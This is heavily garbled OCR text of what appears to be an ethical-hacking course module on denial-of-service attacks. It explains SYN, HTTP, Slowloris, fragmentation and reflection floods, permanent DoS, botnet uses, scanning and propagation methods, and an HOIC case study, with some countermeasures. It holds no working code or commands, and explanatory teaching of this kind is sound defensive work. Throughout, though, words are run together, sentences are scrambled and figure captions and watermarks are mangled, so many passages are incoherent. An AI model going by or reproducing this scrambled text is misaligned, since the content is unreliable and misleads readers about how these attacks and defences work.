sendsa large number of ICMPECHOrequest packetsto an IP broadcastnetwork.Thiscausesall
the hostso n the broadcastnetwork to respondto the receivedICMPECHO requests.These
responsesare sent to thevictim’s
machine becausethe IPaddress w as spoofed
bytheattacker,
causing
significant
traffic
victim’s
making
itcrash.
to the andultimately
machine

ical andCountermensores
Mackin ©by E-Comel
Copyright
Attacker

1 BroadcastNetwork
Victim
gure10.6Suc attack

ical andCountermensores
Mackin ©by E-Comel
Copyright
 PulseWaveand Zero-Day
DDoSAttacks

‘neato
have
oye ben patedreece

(2 pu
‘eng
(200
Gbps
oemorei s suicent to zou
thevc
deploys
pathfo thexpos 0005

PulseWaveDDoSAttack
Pulsewave DDoSattacksare the latesttypeof DDoSattacksemployed bythreat actors to
disrupt the standardoperationsof targets. Generally, DDoS attack patterns are continuous

incomingtrafficlows. However,
the attackis huge,
in pulsewave
DDoS
attacks,
the entire bandwidthof target
consuming
repetitivetrain of packets
as pulses
the attackpatternis periodic,
networks.Attackerssenda highly
to the targetvictim every10 min, andthe attacksession
and

enough an
lastsfor approximately hour or some days.
to crowda networkpipe. Recovery
impossible,
A single pulse
from suchattacks
(300Gbps or more) is more than
i s very difficultand occasionally

i 400 soos

107:Pulse
Figure wave 0D0S
a tta

Modul1 0Page
1297 ical andCountermensores
Mackin
©
Copyright
by E-Comel
Zero-Day
DDoSAttack
Zero-day
DDoSattacksare attacksi n which DDoSvulnerabilitiesdo not have patches or
effectivedefensivemechanisms.Until the victim identifiesthe threat actor'sattackstrategy
and deploys a patch
for the exploitedDDoSvulnerability,the attackeractivelyblocksall the
victim'sresources andstealsthe victim’s
data.Theseattackscan cause severe damage to the
Victim'snetworkinfrastructureand assets.Currently,
there is no versatileapproach to protect
networksfromthistypeof attack.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SYNFloodAttack

T h etargetm achine sendstack SYN/ACKin t the

response eguest

Thetarget
machine
get
the the
doesnot response becausesource

multiple
fending
smack
SY equetstoa
Rot,butnever the
repyingto

SYÂ¥N
Flood Attack
In a SYNattack,the attackersendsa large numberof SYNrequests to the targetserver (victim)
with fakesource IP addresses. Theattack creates incomplete TCPconnections that use up
networkresources. Normally, whena clientwants to begin a TCPconnection to a server, the
clientandserver exchange thefollowing seriesof messages
+
ATCPSYNrequest packetis sent toa server.
+
Theserver sendsa SYN/ACK (acknowledgement) i n responseto the request.
‘Theclientsendsa response
ACKto the server to complete
the session setup.
Thismethodisa “three-way
handshake.―
In a SYNattack,the attackerexploits the three-way handshakemethod.First,the attacker
sends a fake
to the client's(attacker's)
server waiting
to
TCPSYNrequestthe targetserver. the server sends
After
a SYN/ACK
i n response
request,the client never sendsa n ACKresponse.Thisleavesthe
to complete
the connection,
SYNflooding
takesadvantage
of the flawedmanner i n whichmost hostsimplement the TCP
three-way
handshake.Thisattack occurs when the attackersendsunlimitedSYNpackets
(requests)
to the host system.
The process of transmittingsuchpackets is fasterthan the
systemcan handle.Normally, withtheTCPthree-way
a connection is established handshake.
Thehostkeepstrackof partially ACKpackets
open connections whilewaitingfor response in a
listening
queue.

ical andCountermensores
Mackin ©by E-Comel
Copyright
As shownin the figure,
whenHost8 receives a SYNrequest fromHostA,it must keep
trackof
the partially
opened queue―
connection i n a “listen for at least75 s.

ao

4 Figure 10.8:
SYNfloodattack
malicioushostcan exploit
‘A anotherhost, managingmanypartial connectionsbysending many
SYNrequests to the
target
host
new connections until it drops
timeouts. Thisability
simultaneously. When
isfull,
the queue thesystem
s ome entries fromthe connection queuethrough
to hold up each incomplete
cannot open
handshake
connection for 75 s can be cumulatively
exploited in a DoSattack.Theattackuses fake IP addresses, making it difficultto trace the
source. An attackerc an fill a tableof connectionseven without spoofingthe source IP address.
attackers
In addition to SYNflood attacks, can alsoemploySYN-ACK and ACK/PUSHACKflood
attacksto disrupt targetmachines.All theseattacksare similarin functionality
with minor
variations.
FloodAttack
SYN-ACK

tothe
Thistypeof attackis similar
attacker
exploits
ACKpackets of
SYNfloodattack,
except
thattype
in this
handshakebysending
the secondstage a three-way
to exhaust
to the targetmachine its resources, a of
of floodattack,the
large number SYN:

‘ACK
andPUSHACKFloodAttack
During ACKare the flags
a n active TCPsession,ACKandPUSH usedto transferinformationto
andfromthe server andclientmachinestill the sessionends.In an ACKandPUSHACKflood
attack,
attackerssenda largeamount of spoofed ACKand PUSHACKpackets to the target
making
machine, it non-functional

ical andCountermensores
Mackin ©by E-Comel
Copyright
 forSYNFloodAttacks
Countermeasures
Properpacket
filtering
is a viablesolutionto SYNfloodattacks.An administratorc an alsotune
stackto reducethe impactof SYNattackswhileallowing
the TCP/IP legitimate
clienttraffic.
SomeSYNattacks donot attemptto upsetservers; instead, theyattemptto consume theentire
bandwidthof the Internet connection. Twotools to counter this attackare SYNcookiesand
SynAttackProtect.
To guard against an attacker
attempting to consume the bandwidth of an Internetconnection,
an administratorcan implement some additional safety measures; for example, theycan
decrease the time-out period i n which a pending connection is maintainedin the “SYN
RECEIVED" state in the queue. Normally, if a client sendsn o response ACK, a server will
retransmit the firstACKpacket.Thisvulnerability can beremovedbydecreasing the time ofthe
first packet's decreasing
retransmission, the numberof packet retransmissions,or turning off
retransmissionsentirely.
packet

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Attack
Fragmentation

Fecal n d OPS

Packet
Original

‘aa
segment
| [Data
segment
2

Fragmentation
Attack
Theseattacksdestroy
a victim'sabilityto reassemblefragmented packetsbyflooding it with
or UDPfragments,
‘TCP resultingi n reducedperformance.In fragmentation
attacks,
the attacker
sendsa largenumberof fragmented (1500+ byte)packets to a targetweb server with a
smallpacket
relatively rate. Sincethe protocolallowsfragmentation,thesepackets are usually
Uninspected as theypassthrough network equipment suchas routers,firewalls,and the
intrusion detection system (IDS)/intrusion preventionsystem (IPS). The reassemblyand
inspection of theselargefragmented packets consume excessive resources. Moreover,the
content i n the packetfragments is randomized bythe attacker,whichmakesthe reassembly
andinspection consume more resourcesand, the system
i n turn, causes to crash.

Original
Packet

‘Data
segment
|Data
segment
|Data
segment
|Data
segment 3

4
‘segment
—

1
Fragment†” =
Fragment = =

108:Fragmentation
Figure attack
3
Frogment —

4
Fragment †”

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SessionFloodAttack
Spoofed
|@ Attackersceeatefake
or spoofed
TCPsessions by carrying
lip

|G Atachersemploythis attack to bypasfirewallsandperform

00S
SYN,A CK,andRST

attack agaistthe
targetnetworkexhausting ts networkresources

‘tackers
create
session
with
‘one
multiple
@
pbAttackers
or more
creat
session
by
completely
fake
RSTor FINpackets
a fake

tultpleACKpackets
along
FSTor FINpackets
wth one of more

SessionFloodAttack
Spoofed
In this typeof attack,
attackerscreate fake or spoofed TCPsessions bycarrying multiple
SYN,
ACK, andRSTor FIN packets. Attackersemploy thisattackto bypass firewallsandperform
DDoS
attacksagainst targetnetworks,exhaustingtheirnetworkresources.
Thefollowing
are examples
for spoofed
session floodattacks:
+
Multiple
SYN-ACKSpoofed
SessionFloodAttack
In this typeof floodattack,
attackerscreate a fakesessionwith multiple
SYNand
multiple ACKpackets,along
with one or more RSTor FINpackets.

‘Multiple
ACKSpoofed
SessionFloodAttack
In thistypeoffloodattack, create a fakesessionbycompletely
attackers skipping SYN
packets and using onlymultiple
ACKpackets along with one or more RSTor FINpackets.
BecauseSYNpackets are not employed andfirewallsmostly use SYNpacket filters to
detectabnormaltraffic, the DDoSdetectionrate of the firewallsis very low for these
of attacks.
types

ical andCountermensores
Mackin ©by E-Comel
Copyright
 HTTPGET/POST
and SlowlorisAttacks

2B | ee 1D
HTTPGET/POSTAttack
HTTPattacksare layer-7
attacks.HTTPclients,
suchas web browsers,
connect to a web server
through
HTTPto sendHTTPrequests,
whichcan beeitherHTTPGETor HTTP POST. Attackers
exploit
theserequeststo perform DoSattacks.
In a n HTTP GETattack,
the attackeruses a time-delayedHTTPheaderto hold on to an HTTP
connection andexhaust
web-server resources. Theattackernever sendsthefull request
to the
targetserver. Consequently,
the server retains the HTTPconnection and waits,making it
for legitimate
inaccessible users. In thesetypesof attacks,
all the networkparameters
appear
healthy whilethe service remains unavailable.
In a n HTTP POSTattack, the attackersendsHTTP requests with complete headersbut an
Incomplete message body to the targetweb server or application. Because themessage body is
incomplete,
unavailable to legitimate users. of
the server waits for the rest the body, making theweb server or webapplication

An HTTPGET/POST attack is a sophisticated layer-7 attackthat does not use malformed

packets, spoofing, or reflectiontechniques. Thistypeof attackrequireslessbandwidththan
other attacksto bringdownthe targeted site or web server. Thisattackaims to compel the
server to allocateas many resources as possible to serve the attack,thereby denying
legitimate
users
access
to resources,
the server's

ical andCountermensores
Mackin ©by E-Comel
Copyright
 HTTPGETAttack

with time-delayed
Request HTTPheader

Target
serverwaitingfor complete
header
Attack
HTTP POST

body
Targetserver waitingfor message

In additionto the aforementioned

HTTPGET/POST can employ
attack,attackers the following
HTTPfloodattacksto exhaustthe target
network'sbandwidth
Single-Session
HTTPFloodAttack
Inthis typeof floodattack,an attackerexploits the vulnerabilities
in HTTP 1.1 to
bombarda targetwith multiple
requestsi n a single
HTTPsession.
Single-Request
HTTPFloodAttack
In thistypeof flood attack,
attackers froma single
makeseveralHTTP requests HTTP
session bymasking these requests within one HTTPpacket.
This technique
allows
attackersto beanonymousand invisiblewhile performing
DDoSattacks.
HTTPGETFloodAttack
Recursive
Staying
undetectedis keyfor attackers.An attackerposingas a legitimate
user and
performing
legitimate
actions can trick any firewall into believing
that the source is
legitimate GETcollectsa list of pagesor imagesandappearsto
while it is not. Recursive
begoingthrough thesepagesor images.However, it stealthily
performsflooding
attacks
on the target.The recursive GETin combinationwith an HTTPfloodattackcan cause

to
the
extreme damage target.
RandomRecursive
GETFloodAttack
Thistypeofattackis a tweakedversion ofthe recursive GETfloodattack.It is designed
for forums,
blogs,
and other websitesthat have pages i n a sequence. Similarto the
recursive GET flood attack,i n
this attack,the recursive GETpretendsto be going
through pages.Because the targetsare forums, groups,andother blogs,
the attacker
uses randomnumbers from a validpagerangeto poseas a legitimate user andsends a
new GETrequest each time. In both recursive GETand randomrecursive GETflood
attacks,the targetis bombardedwith a large exhausting
numberof GET requests, its
resources.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Slowloris Attack
Slowlorisis a DDoS attacktool used to perform
layer-7
DDoS attacksto take down web
Itis distinctly
infrastructure. differentfromothertoolsin that it usesperfectly
legitimate
HTTP
traffic to take down a targetserver. In Slowlorisattacks, the attackersendspartialHTTP
requests to thetargetwebserver or application,
Upon receivingthe partial the target
requests,
server opens multiple connections and waits for the requests to complete.However, these
requests remain incomplete,
causingthetargetserver’smaximum concurrent connection pool

be
to filled up andadditionalconnection
attempts
be to denied.
NormalHTTP request-responseconnection

TTP response

SlowlorisDDoSattack
HITPrequest

ical andCountermensores
Mackin ©by E-Comel
Copyright
 UDPApplication FloodAttack
Layer
1@someoftheUoP-based
application
thatemploy
layerprotocols attackerscan forlodingthetarget
networks

EBco
Netsios
5
|
S|
|
ver |
UDPApplication FloodAttack
Layer
Though some application
UDPfloodattacksare knownfor their volumetricattacknature, layer
that relyon UDPcan be employed
protocols byattackersto performfloodattackso n target
networks.
The following
are examples layerprotocols
application
for UDP-based that attackerscan
employforflooding
targetnetworks:
Character GeneratorProtocol FileTransferProtocol(TFTP)
‘Trivial
(CHARGEN) NetworkBasicInput/Output
System
Simple
NetworkManagement
Protocol (Wetsi0s)
Version
2 (SNMPv2)

{A0TD)
Guoteofthe Oxy
NP
QuakeNetworkProtocol

sspP
call
Remoteprocedure
(RPC) SteamProtocol
Voice over Internet Protocol(VoIP)
Lightweight
Connection-less Directory
Protocol(CLDAP)
‘Access

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Multi-VectorAttack CEH
Attacks
to sablethetage ystemor sevice

_tackers
rap change
attack
packets,
7)
nd repeatedly thefrm of thei 0005

an exaust thei resources with tel focusdiverted

t othe wrong
6,
souti
SYN Layer

insequence

Mult-Vector attack,
in parallel

‘Multi-Vector
Attack
In multi-vectorDDoSattacks,the attackeruses combinationsof volumetric,protocol,
and
applicationlayerattacksto take down the targetsystemor service. The attackerquickly
changes from one formof DDoSattack(e.g.,SYNpackets)to another(layer7).Theseattacks
are either launchedthrough
one vector at a time or through
multiple
vectors i n parallel
to
a company’s
confuse IT department,
making
them spend
all their resources and maliciously
diverting their
focus.

Mult-Vectorattack
in parallel

Figure
10:12:
Muttvectorattack

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Peer-to-Peer
Attack

‘tacksexploflawsoundinthenetwork
using
theD+ (DectConnect)
pots whichused fo
of
a l ypes
sharing

—o
=

Peer-to-Peer Attack
A peer-to-peerattackis a formof DDoSattacki n whichtheattackerexploits anumber of bugs
i n peer-to-peer
servers to initiate
use the DirectConnect(DC++) aDDOS
attack.
protocol,
Attackersexploit
flawsfound i n networksthat
whichallowsthe exchange
messagingclients.Thiskind of attackdoes not use
of filesbetweeninstant-
botnets.Unlikea botnet-basedattack,
a
peer-to-peer attack eliminates the needfor attackers to communicate with the clientsthey
subvert.Here, the attackerinstructsclientsof large file sharing
peer-to-peer hubsto disconnect
fromtheir peer-to-peer networkandinsteadconnect to the victim’s website.Consequently,
severalthousandcomputers may aggressively attemptto connect to a targetwebsite,
causinga
drop i n the performance of the targetwebsite.It is easyto identify
peer-to-peerattacksbased
on signatures. Byusingthis method, attackerslaunchmassive DoSattacksto compromise
websites.
Peer-to-peerDDoS attacks can be minimized by specifying portsfor peer-to-peer
communication. For example,
specifying
port 80 to disallowpeer-to-peer
communication
minimizes the possibility
of attackson websites,

oR 10.13Peer-to-peer
Figure attack
a
ical andCountermensores
Mackin ©by E-Comel
Copyright
 PermanentDenial-of-ServiceAttack

damage
to system
hardware

other
Dos Unlike
to
or rina
replace
thesystem
tacts, sabotags
the harcware
hardware, the Wet
reguiing

Bricking
system, a hardware
a5updates
thsattackers
end atothe
Thisattackscari ou using method
Using metho,
known "biking system
fraudulent i

a an ep

aL Se
PermanentDenial-of-Service
Attack
PermanentDoS(PDoS) attacks,
alsoknownas phlashing, purely targethardwareand cause
irreversibledamage to the hardware,Unlikeothertypesof DoSattacks, it sabotagesthe system
hardware, requiringthe victim to replaceor reinstallthe hardware.ThePDoS attackexploits
securityflawsi n a deviceto allow remote administrationo n the management interfacesof the
hardware,
vietim’s suchas printers,routers,andother networking devices.
Thistypeof attackis quicker andmore destructivethanconventionalDoSattacks.It workswith
a limitedamount of resources, unlikea DDoSattack, i n whichattackers unleasha set of
zombiesonto a target.Attackersperform PDoSattacksbyusinga methodknown as the
“bricking―
of a system.In this method, the attackersendsemails, IRCchats, tweets,or videos
with fraudulent content for hardwareupdates to the victim. The hardwareupdates are
modifiedandcorrupted with vulnerabilitiesor defectivefirmware.Whenthe victim clickson a
link or pop-upwindow
system. referring
Consequently, the itin
to the fraudulenthardwareupdate, victim installs
the attackerattains complete controlover the victim'ssystem.
their

Sends
email,
chats,
tweets,
post,IRC
with fraudulentcontent for hardware
videos
updates

[Atachorgotsacess to victim'scompat viene

codeIs executed)
(Malicious
Figure
20.14:
Permanent
OoSattack

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DistributedReflectionDenial-of-Service(DRDoS)
Attack

| dtruted feed dena servic

attack
ORDO,
se

spooted
the
knowna tack,
oles use of
mutile

DistributedReflectionDenial-of-Service(DRDoS)
Attack
A distributedreflectionDoS(DRDoS)
attack,
alsoknownas a “spoofed―
attack,
involvesthe use
of multiple intermediaryand secondary
machinesthat contributeto a DDoSattackagainst a

target machineor application. A DRDoSattack exploits the TCPthree-way handshake

vulnerability
Thisattackinvolvesan attackermachine, intermediary victims (zombies),
secondary victims
(reflectors),
anda targetmachine.Theattackerlaunchesthisattackbysending requeststo the
intermediary
hosts,whichi n turn
The processof a DRDOS
reflect
theattacktrafficto thetarget.
attackis as follows.First,the attackercommandsthe intermediary
victims (zombies)to senda stream of packets(TCP
the source IPaddressto other non-compromised
SYN) with the primary target’s
machines (secondary
IP address
victims or reflectors)
order to exhortthem to establisha connection with the primary target.Consequently,
as
in
the
reflectorssend2 hugevolumeof traffic(SYN/ACK) to the primarytargetto establish a new
connection with it because theybelievethe hostrequested it. Theprimary targetdiscards the
SYN/ACK packets received from the reflectors
because theydid not sendthe SYNpacket.
Meanwhile, the reflectorswait for the ACKresponsefromthe primarytarget.Assuming that
the packet was lost,the reflector machinesresendSYN/ACK packets to the primarytargetto
establishthe connection,
with a heavy
until a time-out
occurs.
In this manner, the targetmachineis flooded
volumeof trafficfromthe reflectormachines.
reflectormachines
overwhelms the targetmachine.
Thecombinedbandwidthof these

ADRDoS attackis an intelligent

attackbecausei t is very difficultor even impossible
to trace the
attacker.
Insteadof the actualattacker,the secondary victims (reflectors)
seem to attackthe
primarytargetdirectly. Thisattack is more effectivethan a typical DDoSattack because
multiple
intermediary and
secondary
victims generate huge
ical
attackbandwidth.

andCountermensores ©
Mackin by E-Comel
Copyright
 Primary

Attacker
Intermediary
Victims
Secondary
Victims

Countermeasures
10.15:
Figure
reflection
[DRDOS)
Distributed Ds attack

>
Turn off the Character Generator Protocol (CHARGEN)
service to stopthis attack
method
© Downloadthe latestupdates
andpatches
for servers

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

Botnets
The term “bot― and refersto softwareapplications
is a contraction of “robot― that run
automatedtasksover the Internet.Attackersuse botsto infecta large numberof computers
that forma network, allowing
or “botnet,― them to launchDDoSattacks,generate spam,
spread viruses, andcommit othertypesof crime.
Thissection dealswith organized
cyber-crime organizational
syndicates, charts,
botnets,and
botnetpropagation techniques; scanningmethodsfor finding
botnet ecosystems; vulnerable
machines;
ofmalicious
andthe propagation
code.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 CyberCrime: Organizational
Organized Chart

o=ae
Babson fod acon tet
BOG em

@ @
Organized Crime: Organizational
Cyber Chart
Organized CrimeSyndicates
Whilecyber criminalsworkedindependently i n the past,they now tend to operatei n organized
They
‘groups. are increasingly with organized
associated crime syndicatesandtakeadvantage of
the sophisticated techniquesof these syndicates to engagei n illegal activity,usually for
monetary benefit.Thereare organized
groupsof cyber criminalswhowork in a hierarchical set
up with a predefinedrevenue-sharingmodel,whichis a kindof major corporation that offers
services. Organized
criminal groupscreate and rent botnetsandoffervarious
services ranging
fromthe development
of malwareand hacking
of bankaccountsto the deployment of massive
anytargetfora price.
DoSattacksagainst
For example, an organized crime syndicatemightperform a DDoSattackagainst a bank to
divertthe attention of the bank’s team whiletheycleanout bankaccountswith stolen
security
account credentials.The growing involvementof organized criminalsyndicatesi n politically
motivatedcyber warfareandhacktivismis a matter of cancern for nationalsecurity
agencies.
Cybercrime featuresa complicated rangeof players,
andcyber criminalsare paidaccording to
the tasktheyperform theyhold.Theheadof the cybercrime
or the position organization (i.e.,
the boss) acts as a business entrepreneur.The bossdoes not commit any crimes directly
Immediately belowthe bossin theorganizational hierarchy
is the “underboss,―
who sets up a
C&Cserver and crimeware toolkit databaseto manage the implementation of attacksand
provide Trojans. Belowthe underbossare various “campaign managers―with their own
affiliationnetworksfor implementing attacksand stealing
data.Finally,resellerssellthe stolen

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Botnets
\@ 80tsare software
repetitive that
applications run automated
webspidering
tass, suchas andsearch
tasksover theinterneta nd
engine Indexing
denialofservicenetwork
|@ Abotnetis a huge
attacks
ofcompromised
by
andcanbeused an attacker
systems to launch

gen.
BO eB) o eSSDa
Sager sh= et vert

Botnets
Botsare usedfor benign datacollectionor data mining activities, spidering,―
suchas “web as
well as to coordinateDoSattacks. Themain purposeof a bot is to collectdata.Thereare
differenttypesof bots,suchas Internet bots,
IRCbots,andchatterbots.Examples for IRCbots
are Supybot,
Sopel,EnergyMech, andEggdrop.
A botnet(acontraction of “roBOT
NETwork")
is @group of computers bybots;
“infected―
however, botnetscan be usedfor both positiveand negative purposes. As a hacking tool,a
botnetis composed of a huge networkof compromised systems. A relativelysmallbotnetof
1,000botshasa combinedbandwidthlarger thanthe bandwidthof most corporate systems.
adventof botnetsled to an enormous increase i n cybercrime.
‘The Botnets formthe core of the
activitycenter that linksand unites various partsof the cybercriminal
cybercriminal world
Cybercriminal
service suppliers
maliciouscode development,
encryptionandpacking.
bulletproofhosting, a
are a partof cybercrime network.They offer services suchas
the creation of browserexploits, and

Maliciouscode is the primarytool used bycriminalorganizations to commit cybercrimes.

Botnetowners orderbothbotsandothermaliciousprogramssuchas Trojans, viruses,worms,
keyloggers,and specially crafted applicationsto attack remote computers via networks.
Developers serviceson public
offermalware sitesor closedInternetresources.
Botnetsare agentsthat an intrudercan sendto a server system to performan illegal activity.
Botnets run hiddenprograms that allowthe identificationof systemvulnerabilities.Attackers
can use botnets to perform the tedious tasksinvolved in probing a systemfor known
vulnerabilities.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 can use botnetsto perform
Attackers the following:
DDoSattacks:Botnetscan generate DDoSattacks,whichconsume the bandwidthof the
victim'scomputers. Botnets can alsooverloada system,wastingvaluablehost system
resourcesanddestroying networkconnectivity
‘Spamming:
Attackersuse a proxy for spamming. They
SOCKS harvestemailaddresses
fromwebpagesor other sources.
Sniffing
traffic:A packetsnifferobservesthe data trafficenteringa compromised
machine.It allowsan attackerto collect sensitive informationsuchas credit card
numbersand passwords. The snifferalsoallowsan attackerto stealinformation
from
anotherbotnet. In other words,
one botnet and use it against botnetscan rob one
another.
Keylogging:Keylogging is a methodof recording the keys
typedon a keyboard, and it
providessensitive informationsuchas system passwords.Attackersuse keylogging
to
harvestaccount login informationforservices suchas PayPal
Spreading new malware:Botnetscan beusedto spread new bots.

Installing
advertisementadd-ons:Botnets can be usedto perpetrate a “click by
fraud―

automating
clicks.
GoogleAdSenseabuse:Somecompanies permitshowing Google AdSense adson their
websitesfor economic benefits.Botnets allowa n intruderto automate clickson an ad,
producinga percentageincreasein the clickqueue.
Attackson IRCchatnetworks:Alsocalledcloneattacks, theseattacksare similarto a
DDoSattack.
IRCnetwork,
A master
agent
instructseachbotto link to thousands
whichcan floodthe network.
ofclones withinan

‘Manipulating
manipulate
online
onlinepolls polls
andgames: Every
andgames.
botnethasa unique address,
enabling
it to

identity
‘Mass theft: Botnetscan senda large
numberof emailswhile impersonating
a
reputable such as eBay.This technique
organization allows attackersto steal
information
foridentity
theft.
Thebelowfigure illustrateshow an attackerlaunchesa botnet-basedDoSattackon a target
server. Theattackersets up a bot C&Ccenter,following whichthey infecta machine(bot)and
compromises it. Later,theyuse this bot to infectand compromiseother vulnerablesystems
availablei n the network, resulting
i n a botnet.Thebots (also knownas zombies) connect to the
C&Ccenter and awaits instructions. Subsequently, the attackersendsmaliciouscommands to
the botsthrough the C&Ccenter. Finally, as per the attacker'sinstructions,
the botslauncha
DoSattackon a targetserver, making its services unavailable
to legitimateusersi n the network.

ical andCountermensores
Mackin ©by E-Comel
Copyright
o/ 33SS
2,
a
oe
 BotnetSetup
A Typical

A Typical
BotnetSetup
Botnet Ecosystem

Figure
20.19:
Botnetecosystem
 Methodsfor Finding
Scanning VulnerableMachines

Random
Seanning
“©The
nected machineprobes
ange andchecks
IPaddresses
for vnerabiies
fromthetargetnetwork
randomly

Scanning astpotently
vulnerable
and
Bivtist attacker
‘An fst collects of machines thenscans
fo finduinerable
‘hem machines

information
‘uses obtained
froman infected
m achineto find
new vulnerable
machines

LocalSubnet T helfected machinelooksfor new vulnerablemachines

nts own locanetwork
ee

Permutation
a litof tonew
|G tures pseudorandom
permutation IPaddresses
find wuinerable

Methodsfor Finding
Scanning VulnerableMachines
beloware scanning methodsusedbyan attackerto find vulnerablemachinesi n
Discussed a
network:
=
Random
Scanning
In this technique, the infectedmachine(anattacker'smachineor a zombie) probes IP
addresses randomly i n the target network'sIP rangeandcheckstheir vulnerability.
On
finding a vulnerablemachine, it hacksandattemptsto infectthevulnerablemachineby
installing the same maliciouscodeinstalledon it. Thistechnique significant
generates
traffic becausemanycompromised machinesprobe andcheckthe same IPaddresses.
Malwarepropagates quickly andthe speed
i n the initial stage, of propagation
reducesas
of
the number new IPaddresses
Hit-ist Scanning
available decreases
with time.

Through
scanning,an attackerfirstcollectsa listof potentially
vulnerablemachines
and
then creates a zombiearmy. Subsequently, the attacker scans the list to find a
vulnerablemachine.On finding one, the attackerinstallsmaliciouscode on it and
dividesthelisti n half.Theattacker
continuesto scanone half,whereas the other halfis
scannedbythe newly compromisedmachine.Thisprocesskeeps repeating,causingthe
numberof compromised machinesto increase exponentially.
Thistechnique ensures

within a shorttime. codepotentially

the installationof malicious
inthe
on all the vulnerablemachines hit list

Topological
Scanning
Thistechniqueuses the information
obtainedfrom an infectedmachineto findnew
vulnerablemachines.An infectedhostchecksfor URLsi n the harddriveof a machine

ical andCountermensores
Mackin ©by E-Comel
Copyright
that it wants to infect.Subsequently,
it shortlists and it checks
URLsand targets, their
vulnerability.
Thistechnique
yields
accurate results,and its performance
is similarto
thatofthehit-listscanningtechnique.
LocalSubnetScanning
In thistechnique,
an infectedmachine
searches
for new vulnerablemachines
i n its local
byusingthe information
network,behinda firewall, hiddeni n the localaddresses.
Attackersuse
Permutation
this
technique
Scanning
i n combination
with otherscanningmechanisms.

In this technique, attackerssharea common pseudorandom permutation list of IP

addresses of all machines.The list is createdusinga block cipher of 32 bits and a
preselectedkey. If acompromised hostis infectedduring
eitherhit-listscanningor local
subnet scanning,the list Is scannedfrom immediately after the point of the
compromised host to identifyn ew targets. If a compromisedhost is infectedduring
permutation scanning,scanningrestarts froma randompoint.If an already infected
machineis encountered, scanningrestarts from a new randomstart point i n the
permutationlist. The processof scanningstops when the compromised host
consecutivelyencounters a predefined numberof already
infectedmachines andfailsto
find new targets.Thereafter, keyis generated
a new permutation to initiate a new
scanningphase.
hasthe following
Permutation scanning advantages:
©. The reinfection
ofa targeti s avoided.
© a re scanned
Newtargets at random, ensuringa high
thereby scanningspeed,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 HowDoesMaliciousCode Propagate?
‘Attackers
ue thre malicious
to propagate
techniques codeto newly
discovered
vulnerable systems

Ee canst oon
ieee Seve
Eo 25
acte~
Anattacker an atacktoolkt
places on

Ome
8s
tee
eo
EES
stem

‘The
host
attaching tse anes te

How DoesMalicious CodePropagate?

beloware three techniques
Discussed usedbyan attackerto propagate
maliciouscodeand
build
=
attacknetworks:
CentralSourcePropagation
In this technique,
the attackerplaces an attacktoolkit on a centralsource anda copyof
the attacktoolkit is transferredto a newly discoveredvulnerablesystem. Once the
attackerfindsa vulnerablemachine,theyinstruct the centralsource to transfera copy
of the attacktoolkit to the newly compromised machine, on whichattacktools are
automatically installedunder management bya scripting mechanism. Thisinitiates a
new attackcycle, i n whichthe newly infectedmachinesearches for other vulnerable
machines
uses HTTP,
and
FTP,repeats to installthe attacktoolkit. In general,
the process
andRPCprotocols.
thistechnique

Central Source

=
Attacker Figure
20.20Central
source propagstion
NextVictim

ical andCountermensores
Mackin ©by E-Comel
Copyright
Back-chaining
Propagation
In thistechnique, the attackerplaces an attacktoolkit o n their own system, anda copy
of the attacktoolkit is transferredto a newly discoveredvulnerablesystem.Theattack
tools installed on the attacking machineuse some special methodsto accepta
connection fromthe compromised systemandthen transfera file containing the attack
tools to it. Simple portlistenerscontaining a copyof this file or full intruder-installed
web servers, both of which use the TrivialFileTransferProtocol(TFTP), supportthis
back-channel filecopy,

Repeat

Figue10.21:Back-calning
propagation
Propagation
‘Autonomous
Unlikethe previously
discussed in whichan external
mechanisms, file source transfers
the attacktoolkit, the attacking
in autonomous propagation, hostitself transfersthe
attacktoolkitto a newlydiscovered
vulnerable
system,exactly
at the time it breaks
into
that system.
Exploitand
CopyCode
ee a
Attacker Figure
10.22:
Victim
Propagation
Autonomous
Next Victim

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

DDoSCase Study
DDoSattacksare sophisticated and complex attacksbasedon DoSandmultipledistributed
attack sources. In a DDoSattack,a largenumberof compromised computers(zombies)
interruptor suspend networkservices. Thissection presents
a
of DDoSattack
a casestudy

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DDoSAttack

Lea
So l ed
| @} &| @~|Google

DDoSAttack
In a DDoSattack,attackersuse a group of compromised systems(botsor zombies)usually
infected to perform
with Trojans a DoSattack or network
on a targetsystem resource.

: —
DE i=

q
Ea
:
@ @--}Google
“oe
«
|fi]
‘As
figure,
attack
shown networking aHigh
i n the an anonymous
10:23DDoS
Figure
hacker hosts
scenario

Orbitlon Cannon(HOIC)DDoSattack
tool o n a web server theyown or on a compromised web server. Thehackerthenadvertises
the
HOICDDoSattacktool on social sites or search enginessuchas Twitter,Facebook
andGoogle with a malicious
downloadlink.

Module0 1226
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
Userswho desireto perform the DDoSattackmaydownloadthe HOICDDoSattacktool by
clicking o n the maliciousdownloadlink provided bythe hacker.Theseusers are termed
“volunteers.―
instructions to proceed
server (e.g., PayPal,
connect anonymous
All the volunteers via an IRCchannel to the hackerandawait
further. Thehackerinstructs the volunteersto flood the targetweb
MasterCard, and PAYBACK) with multiple requests.On receiving
instructions, the volunteers act accordingly. Consequently, the target server becomes
overwhelmed andstopsresponding to requests fromeven legitimateusers.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 HackersAdvertise Links for Downloading
Botnets

& warnine!
$1,000 Gift Card
Amazon’

HackersAdvertiseLinks for Downloading

Botnets
Hackersadvertisebotnetson various blogs, searchengines, socialnetworking sites,emails,and
so on with download
Into downloading
alsouse fakeupdates
links.Hackers
the malware.Theintention i n doing
and
security
alerts
so is to spread
the size of the attacknetwork.Thismethodof attackis very quick
to trickthevictim
the botnetand increase
and effective.The below
figureshowsexamples foradshostedbyhackerso n the Internetto downloadbotnets.

A warnine!
$1,000 GiftCard
Amazon’
2
MAC MalwarewarningAlert

Module0 1228
